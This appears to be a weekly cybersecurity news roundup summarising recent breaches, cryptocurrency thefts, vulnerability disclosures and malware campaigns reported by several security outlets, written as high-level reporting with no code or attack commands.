Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs, Fortinet
TL;DR
Major security incidents this week include a TeamPCP breach of EU Commission systems exposing data from 30 entities, North Korean hackers stealing $280 million from Drift Protocol, and discovery of pre-authentication RCE vulnerabilities in Progress ShareFile.
Multiple high-impact incidents including a major EU data breach affecting 30 entities, a $280M cryptocurrency theft attributed to North Korean actors, and critical vulnerabilities in enterprise file-sharing platforms.
CERT-EU has attributed the European Commission cloud infrastructure breach to the TeamPCP threat group, revealing the incident exposed sensitive data belonging to at least 29 other EU entities beyond the Commission itself. The breach demonstrates the cascading impact of cloud infrastructure compromises in interconnected government environments, highlighting critical risks in shared cloud architectures used by governmental organizations.
The Drift Protocol suffered a devastating $280 million loss after threat actors, likely linked to North Korean state operations, seized control of the platform's Security Council administrative powers. The sophisticated attack represents one of the largest cryptocurrency thefts of the year and underscores the continuing threat posed by DPRK-linked groups to decentralized finance platforms.
A former core infrastructure engineer pleaded guilty to an extortion scheme that locked Windows administrators out of 254 servers at his New Jersey-based industrial employer. The case highlights the persistent threat of malicious insiders with privileged access and the critical importance of robust access controls and monitoring for departing employees with administrative privileges.
Researchers discovered two vulnerabilities in Progress ShareFile that can be chained together to enable unauthenticated file exfiltration from affected enterprise environments. The pre-authentication remote code execution attack path poses significant risks to organizations using the popular secure file transfer solution, particularly given ShareFile's widespread adoption in enterprise environments.
Apple has quietly extended patches against vulnerabilities exploited by the DarkSword exploit kit to include iOS and iPadOS 18.7.7. The expanded patch coverage suggests the vulnerabilities targeted by DarkSword represent a broader threat surface than initially disclosed, emphasizing the importance of prompt iOS updates.
Medical technology giant Stryker Corporation has returned to full operational status three weeks after the Iranian-linked Handala hacktivist group claimed responsibility for a data-wiping cyberattack that severely disrupted the company's systems. The incident demonstrates both the destructive capabilities of state-affiliated threat groups and the resilience planning required for critical healthcare infrastructure.
Fortinet researchers detailed a North Korean campaign using LNK files and GitHub repositories as covert command-and-control infrastructure. The technique demonstrates the continued evolution of DPRK cyber operations, utilizing legitimate platforms to evade detection while maintaining persistent access to compromised Windows environments through multi-stage PowerShell execution chains.
Threat actors are capitalizing on the recent Claude Code source code leak by creating fake GitHub repositories that deliver Vidar information-stealing malware. The campaign highlights how high-profile security incidents create opportunities for follow-on attacks targeting users seeking leaked or compromised code.
A Nigerian romance scammer received a 15-year prison sentence after accidentally targeting another fraudster, who provided investigators with incriminating chat logs. The case offers rare insight into the operational security failures that can bring down otherwise sophisticated social engineering operations.
Microsoft continues investigating intermittent Exchange Online mailbox access problems affecting Outlook mobile and macOS users over several weeks. The ongoing availability issues highlight the operational risks associated with cloud email dependencies and the challenges of maintaining service reliability at scale.
Residential Proxy Evasion: Research indicates residential proxies successfully evaded IP reputation systems in 78% of over 4 billion analyzed sessions, demonstrating significant blind spots in current threat detection methodologies.
Physical-Digital Crime Convergence: Threat actors are exploiting vacant properties as mail intercept points, combining traditional fraud techniques with digital identity theft in hybrid criminal operations.
Microsoft Force Upgrades: Microsoft has begun automatically upgrading unmanaged Windows 11 24H2 devices to version 25H2, potentially creating compatibility issues for organizations with delayed patch management cycles.
Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs, Fortinet
